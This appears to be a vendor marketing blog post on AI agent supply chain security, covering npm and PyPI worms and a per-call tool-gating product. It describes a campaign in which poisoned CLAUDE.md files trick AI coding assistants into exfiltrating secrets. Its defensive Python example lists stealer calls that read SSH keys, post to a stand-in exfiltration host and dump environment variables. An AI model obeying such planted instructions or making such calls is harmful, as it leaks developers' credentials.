AI supply chain security is not a tooling adoption problem. It is the next non-human identity problem — and every AI agent running in production today is a package consumer with no runtime identity, no dependency governance, and no containment layer when a vulnerable library executes.
Last week, Anthropic disclosed findings from Claude Mythos Preview — its most capable frontier model — deployed through Project Glasswing, a controlled access program with roughly 50 participating organizations. The model was tasked with scanning open-source software at scale. In a timeframe measured in weeks, it identified 23,000+ potential vulnerabilities across more than 1,000 OSS projects. Of 1,900 findings reviewed by external security firms, 1,726 were confirmed real — with over 1,000 rated high or critical severity. Anthropic projects the final tally will reach 3,900 confirmed critical/high findings, and 6,200 severe vulnerabilities as scans continue.
That number is staggering on its own. But the real story isn't the count — it's the context. The open-source projects Claude Mythos scanned are not obscure libraries. They are the packages your AI agents are built on: the npm ecosystem, Python tooling like LangChain (847 million cumulative downloads), LangGraph, LiteLLM, and LangFlow — the exact frameworks enterprise AI agents depend on today. The 23,000 figure is not an abstract audit of legacy code. It is a snapshot of the attack surface that every enterprise AI agent is executing against, right now, in production.
And at the same moment Mythos was scanning for known-pattern vulnerabilities, adversaries were running a different playbook: weaponizing the supply chain itself. The TanStack npm worm (May 11, 2026) compromised 42 packages with 518+ million cumulative downloads in under 7 minutes, using legitimate OIDC-attested provenance that passed every SLSA Build Level 3 check. The TrapDoor campaign (May 22, 2026) spread credential-stealing malware across 34 packages on npm, PyPI, and Crates.io — and specifically targeted LangChain, browser-use, and LangFlow with poisoned CLAUDE.md files designed to trick AI assistants into running exfiltration payloads. This is not future risk. It is current-quarter breach data.
What the Anthropic Mythos Finding Actually Means
Claude Mythos Preview is not a specialized vulnerability scanner. It is a general-purpose frontier model that Anthropic has concluded has reached a level of coding capability where it can surpass all but the most skilled human security researchers at finding and exploiting software vulnerabilities — often entirely autonomously.
Under Project Glasswing, Anthropic gave controlled access to Mythos to approximately 50 organizations to scan their own and third-party OSS code. The results were extraordinary in scale: Mozilla found 271 Firefox vulnerabilities using Mythos. Palo Alto Networks identified dozens of flaws in their own codebase. Even widely audited projects like curl received findings — though in curl's case, only one low-severity vulnerability was detected, a testament to how deeply curl's maintainers already invest in security.
Anthropic has noted that the surge in AI-powered vulnerability discovery is adding pressure to an already-overloaded security ecosystem. With 1,100+ unverified findings reported to vendors and only 75 critical/high issues patched so far — and 65 security advisories published — the patch queue is growing faster than the remediation rate. Your OSS dependencies have a non-trivial probability of containing unpatched, AI-discovered vulnerabilities right now, and the timeline for exploitation is compressing as the same model capabilities become available to adversaries.
Sources
- SecurityWeek — Anthropic: Mythos Detected 23,000 Potential Vulnerabilities Across 1,000 OSS Projects
- Anthropic Red Team — Claude Mythos Preview
- Anthropic — Project Glasswing
- curl maintainer Daniel Stenberg — Mythos finds a curl vulnerability
- Help Net Security — Anthropic's new AI model finds and exploits zero-days across every major OS and browser
How AI Agents Amplify OSS Supply Chain Risk
Traditional software supply chain risk is passive: you ship an application with a dependency, and if the dependency is vulnerable, an attacker can exploit it. AI agents make the risk dynamic and recursive. A production AI agent using LangChain or LangGraph autonomously executes tool calls against npm packages, Python libraries, and MCP servers at runtime. It doesn't just ship with dependencies — it actively pulls and chains them mid-execution, often with no human in the loop.
The LangDrained research (Cyera, 2026) found three distinct vulnerability classes in LangChain/LangGraph — one critical (CVE-2025-68664, "LangGrinch") and two high-severity — exposing filesystem files, environment secrets, and conversation history to any attacker who can influence agent inputs. LangChain has 847 million total downloads. Every enterprise using it as their AI agent framework is running vulnerable package execution without a runtime governance layer that can constrain what those packages are allowed to do.
The attack surface is compounded by MCP servers: Trend Micro found 1,467 MCP servers exposed to the internet with zero authentication by April 2026, and an unsafe-defaults vulnerability in the LiteLLM, LangChain, and LangFlow MCP implementations enabled remote command execution in 10 separate packages. When an AI agent calls an MCP tool, it is executing a package invocation with no runtime identity check.
- No SBOM coverage for agentic instructions: A poisoned skill definition does not trigger a CVE and never appears in a software bill of materials. No mainstream security scanner has a detection category for malicious instructions embedded in agent skill definitions — the exact vector the TrapDoor campaign exploited with poisoned CLAUDE.md files.
- SLSA attestation is breakable by build identity compromise: The TanStack worm produced validly-attested SLSA Build Level 3 provenance for malicious packages — the first documented case of an npm worm doing so. Every automated supply chain check passed.
- Autonomous execution with no per-call scoping: Most AI agent frameworks grant tool access at framework initialization, not per-call. A compromised dependency package inherits the full tool scope of the agent — there is no least-privilege boundary at the package level without an external governance layer.
Three Supply Chain Incidents That Reframed the Threat Model
On May 11, 2026 between 19:20 and 19:26 UTC, the threat group TeamPCP published 84 malicious versions across 42 @tanstack/* npm packages. The attack vector: a fork-based "Pwn Request" that triggered a pull_request_target workflow, combined with GitHub Actions cache poisoning. Attacker-controlled binaries extracted an OIDC token from the GitHub Actions runner's process memory, then used it to publish malicious npm packages signed with TanStack's legitimate identity.
Within hours, the worm propagated to Mistral AI, UiPath, Guardrails AI, and dozens of other maintainers. @tanstack/react-router alone receives over 12.7 million weekly downloads. The malicious versions carried legitimate Sigstore attestations — correctly attesting that packages were built and published by the official release workflow. Every automated supply chain check passed. This is the new threat model: the attack doesn't compromise the package contents in a way that scanners detect. It compromises the build identity used to sign the package — so every downstream SLSA and Sigstore verification returns green while malicious code runs.
Sources
- The Hacker News — Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages
- TanStack Blog — Postmortem: TanStack npm supply-chain compromise
- StepSecurity — Mini Shai-Hulud: A Self-Spreading Supply Chain Attack Compromises TanStack npm Packages
- Orca Security — TanStack and 160+ npm/PyPI Packages Compromised in Supply Chain Worm Attack
The TrapDoor campaign, attributed to the GitHub account ddjidd564, began May 22, 2026. It spread credential-stealing malware across 34 packages — 21 npm, 7 PyPI, 6 Crates.io — masquerading as developer utilities and build helpers. Targeted data: SSH keys, AWS credentials, GitHub tokens, browser login databases, environment variables, and API keys.
What distinguishes TrapDoor is its AI-specific attack vector: the campaign opened pull requests against LangChain, browser-use, and LangFlow with malicious .cursorrules and CLAUDE.md files containing hidden instructions designed to trick AI coding assistants into running a "security scan" that would actually execute secret discovery and exfiltration. An AI agent that reads its own context files — standard behavior for all major AI coding tools — becomes the exfiltration vector. The attacker's infrastructure described the operation as a "Universal AI Agent Extraction Framework."
In March 2026, a poisoned Trivy security scanner in the LiteLLM CI/CD pipeline exfiltrated the project's PyPI publish token. The attacker used it to publish malicious LiteLLM 1.82.7 and 1.82.8 — harvesting SSH keys, GCP/AWS/Azure credentials, kubeconfigs, and database passwords from every developer who installed the package. LiteLLM is the most widely used multi-provider LLM routing library in enterprise AI stacks.
That same month, UNC6426 exploited the nx npm supply chain attack to gain AWS Admin access within 72 hours — demonstrating that the time from a compromised package to full cloud infrastructure access is now measured in hours, not days. Every AI agent that installs unverified packages from infected registries is a potential credential exfiltration pathway into cloud infrastructure.
Why Runtime Identity Is the Containment Layer
The supply chain security industry's current response centers on SBOM generation, registry scanning, SLSA provenance verification, and pre-deployment static analysis. All of these are necessary. None of them stop execution-time exploitation.
The TanStack worm proved that SLSA Level 3 attestation can be correctly issued for malicious packages. The TrapDoor campaign proved that hidden instructions in agent context files can turn the AI agent itself into the exfiltration vector. The Mythos findings proved that the 23,000 vulnerabilities already present in OSS packages are not being remediated at the rate they're being discovered — and AI-powered attackers will find the same vulnerabilities Mythos found, if they haven't already.
What static analysis cannot do: enforce a runtime identity boundary around each agent's package execution. If a compromised npm package executes inside an AI agent that has no runtime identity scoping its tool access, file system permissions, and network egress, then the compromised package inherits the full execution context of the agent. This is not a scanning problem. It is a governance architecture problem.
How RuntimeAI Governs the AI Supply Chain Attack Surface
RuntimeAI's Identity + Zero-Trust + Defence-in-Depth platform addresses the AI supply chain threat at the execution layer — the only layer where supply chain attacks actually manifest as enterprise risk.
KYA provides cryptographic workload identity for every AI agent running in your environment. Before any agent can invoke a tool, call an MCP server, or access enterprise data, it must present a verified identity with a declared scope. Unknown agents — including agents that have been compromised by a malicious dependency package and are attempting to escalate scope — receive no access, not just a warning.
This is the containment layer that supply chain attacks cannot bypass: even if a malicious npm package executes inside an agent's dependency tree, it cannot invoke enterprise tools without the agent's declared identity and scoped permissions. The compromised package runs — but it cannot reach your enterprise data, APIs, or infrastructure without clearing the KYA identity gate.
RuntimeAI's AI Integration Fabric sits between AI agents and every enterprise tool they invoke. No agent — and no package executing inside an agent — can call a tool, API, database, or MCP server directly. Every invocation passes through the Integration Fabric, where policy enforces what the agent is allowed to call, with what parameters, and with what scope.
This means that when a compromised LangChain dependency attempts to call a filesystem tool, an AWS API, or an outbound webhook, the Integration Fabric evaluates the call against the agent's declared policy. An invocation that falls outside the agent's declared tool scope — which is exactly what a supply chain exploit would produce — is blocked before it executes. The invocation is logged in the Audit Black Box regardless of outcome.
Every tool call, MCP server invocation, and package execution event is recorded in the Audit Black Box — an immutable, tamper-proof audit trail that survives log destruction, agent termination, and infrastructure compromise. When a TanStack-style worm runs inside an AI agent, the Audit Black Box records every downstream action: what tools were called, what parameters were passed, what data was accessed, and what network egress was attempted.
For forensic response: when Mythos or an attacker discovers a vulnerability in a package your agent depends on, you can determine the blast radius — which agents ran the vulnerable package, what they did, and what data they touched. For compliance: regulators increasingly require demonstrable evidence that AI systems operated within declared boundaries. The Audit Black Box generates that evidence automatically, per-invocation, with no manual instrumentation.
RuntimeAI's Policy Engine (built on Rego/OPA) allows security teams to declare exactly which tools each agent is allowed to call, which packages are allowed to execute within each agent's context, and what network destinations are reachable. This is policy-as-code applied to the AI supply chain: instead of scanning packages and hoping the scanner catches every vulnerability, you enforce a behavioral boundary around what the agent — and its entire dependency tree — is allowed to do.
When Claude Mythos finds 23,000 vulnerabilities in OSS packages — or when an attacker exploits one before a patch ships — the Policy Engine limits the blast radius to what the agent's policy allows. A vulnerable deserialization flaw in LangChain Core (CVE-2025-68664 "LangGrinch") cannot be exploited to read filesystem files if the agent's policy doesn't permit filesystem tool calls. Zero-day supply chain vulnerabilities become contained exploits, not enterprise breaches.
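The per-call scoping gap described under "Autonomous execution with no per-call scoping" and the policy gate described in the Integration Fabric and Policy Engine sections can be illustrated with a small gate that checks every tool invocation against an agent's declared scope and records the verdict. This is an added example written for this post, not RuntimeAI's code; the policy fields, tool names and the "ticket-summarizer" scenario are assumptions constructed for the illustration.

```python
from dataclasses import dataclass, field
from fnmatch import fnmatch
from typing import Any
from urllib.parse import urlparse

@dataclass
class AgentPolicy:
    """Declared scope: callable tools, readable path globs, egress host globs."""
    agent_id: str
    allowed_tools: set[str]
    read_paths: set[str] = field(default_factory=set)
    egress_hosts: set[str] = field(default_factory=set)

class ToolGate:
    """Per-call gate between an agent (and its whole dependency tree) and
    the tools it invokes; every decision, allowed or blocked, is audited."""
    def __init__(self, policy: AgentPolicy) -> None:
        self.policy, self.audit = policy, []

    def evaluate(self, tool: str, args: dict[str, Any]) -> tuple[bool, str]:
        p, path = self.policy, args.get("path", "")
        host = urlparse(args.get("url", "")).hostname or ""
        if tool not in p.allowed_tools:
            verdict = (False, f"tool {tool!r} outside declared scope")
        elif tool == "fs.read" and not any(fnmatch(path, g) for g in p.read_paths):
            verdict = (False, "path outside declared read paths")
        elif tool == "http.post" and not any(fnmatch(host, g) for g in p.egress_hosts):
            verdict = (False, "egress host not allowlisted")
        else:
            verdict = (True, "within declared scope")
        self.audit.append({"agent": p.agent_id, "tool": tool, "args": args,
                           "allowed": verdict[0], "reason": verdict[1]})
        return verdict

# Constructed scenario: a ticket-summarising agent whose dependency tree now
# contains a credential stealer; the policy declares only what the agent needs.
POLICY = AgentPolicy("ticket-summarizer", {"fs.read", "http.post"},
                     read_paths={"/app/prompts/*"},
                     egress_hosts={"tickets.internal.example"})
CALLS = [  # constructed invocation sequence, in order
    ("fs.read", {"path": "/app/prompts/system.md"}),          # legitimate
    ("fs.read", {"path": "/home/agent/.ssh/id_ed25519"}),     # stealer
    ("http.post", {"url": "https://exfil.example/collect"}),  # stealer
    ("shell.exec", {"cmd": "printenv"}),                      # stealer
]

def run_scenario() -> tuple[list[bool], list[dict[str, Any]]]:
    gate = ToolGate(POLICY)
    return [gate.evaluate(t, a)[0] for t, a in CALLS], gate.audit
```

Only the first call is allowed; the three calls a compromised package would make are blocked before execution, and all four appear in the audit trail with a reason.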
Kill Switch: Stopping Supply Chain Execution Mid-Flight
⚡ RuntimeAI Kill Switch — 3-Level Supply Chain Response
SBOM scanners tell you what packages you have. RuntimeAI Kill Switch stops what they do when they're compromised.
RuntimeAI's Supply Chain Containment Stack
- KYA (Know Your Agent) — cryptographic workload identity; unknown or compromised agents get no enterprise access
- AI Integration Fabric — policy-gated tool invocation; no package executes enterprise calls without declared scope
- Audit Black Box — tamper-proof, per-invocation record of every package execution; blast radius forensics in minutes
- Policy Engine (Rego/OPA) — per-agent package invocation allowlisting; zero-day blast radius bounded by declared policy
- PII Shield — PII and secrets redacted inline before any tool call output is returned to the agent; supply chain exfiltration of structured data blocked at the boundary
- Kill Switch — L1 monitor → L2 human alert → L3 mid-execution kill, before data leaves the perimeter
The Mythos finding is a forcing function. When an AI model can discover 23,000 vulnerabilities in 1,000 OSS projects in weeks — vulnerabilities that have existed undetected for years — the patch queue will never clear fast enough. The containment architecture has to be runtime-first: govern what agents can do with the packages they run, not just what packages they're allowed to install.
Security, control, and governance at the AI execution layer. Independent of whether your dependency scanner caught the vulnerability first.
Govern the AI Supply Chain at Runtime
KYA identity, AI Integration Fabric, Audit Black Box, and Kill Switch — containment at the execution layer, not just the scanner.
Or visit → www.runtimeai.io/trial